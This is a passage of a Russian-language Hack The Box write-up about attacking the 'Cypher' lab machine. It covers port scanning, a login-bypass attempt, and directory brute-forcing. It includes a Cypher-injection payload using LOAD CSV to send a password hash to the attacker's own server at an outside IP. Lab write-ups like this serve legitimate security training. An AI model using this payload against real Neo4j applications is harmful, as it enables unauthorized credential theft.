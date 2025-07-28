Се­год­ня я покажу, как при помощи инъ­екции кода на язы­ке Cypher мож­но ата­ковать гра­фовую базу дан­ных Neo4j и обой­ти авто­риза­цию. Затем мы про­ведем инъ­екцию команд ОС и получим сес­сию на хос­те, а соб­рав учет­ные дан­ные, сме­ним поль­зователь­скую сес­сию и повысим при­виле­гии через регис­тра­цию сво­его модуля для BBOT.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Cypher с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности задания — сред­ний.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 57 cypher. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr ' ' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел два откры­тых пор­та:

22 — служ­ба OpenSSH 9.6p1;

80 — веб‑сер­вер Nginx 1.24.0.

По отче­ту Nmap вид­но, что веб‑сер­вер выпол­няет редирект на сайт http:// cypher. htb . Там нас встре­тит сайт с гра­фом и ссыл­кой на стра­ницу авто­риза­ции.

Точка входа

Я поп­робовал вста­вить в фор­му авто­риза­ции базовую наг­рузку, которая бы помог­ла обой­ти авто­риза­цию, если бы сра­бота­ла инъ­екция admin' or 1=1 -- - . Одна­ко получа­ем огромный текст ошиб­ки.

Удоб­нее прос­мотреть текст в Burp History. Нам отоб­ража­ется часть зап­роса на язы­ке Cypher, который исполь­зует­ся на сер­вере.

Про Cypher-инъ­екции я уже писал в од­ном из рай­тапов. По зап­росу вид­но, что хеш пароля воз­вра­щает­ся как зна­чение h. value . Выпол­ним инъ­екцию и эксфиль­тру­ем на свой веб‑сер­вер зна­чение хеша. Сам сер­вер соз­даем коман­дой python3 -m http. server .

admin' OR 1=1 LOAD CSV FROM 'http:/ / 10. 10. 16. 73: 8000/ ? value='+h. value AS hash Return ''//

По­пыт­ки проб­рутить хеш ни к чему не при­вели, поэто­му попыта­емся най­ти еще что‑нибудь инте­рес­ное.

Точка опоры

Поп­робу­ем переб­рать катало­ги и фай­лы при помощи feroxbuster.

Справка: сканирование веба c feroxbuster Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch, DIRB или ffuf. Я пред­почитаю feroxbuster. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -u — URL;

— URL; -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -d — глу­бина ска­ниро­вания;

— глу­бина ска­ниро­вания; -t — количес­тво потоков.

За­даем все парамет­ры и запус­каем перебор:

feroxbuster -u http:/ / cypher. htb/ -w directory_ 2. 3_ medium_ lowercase. txt -d 1 -t 128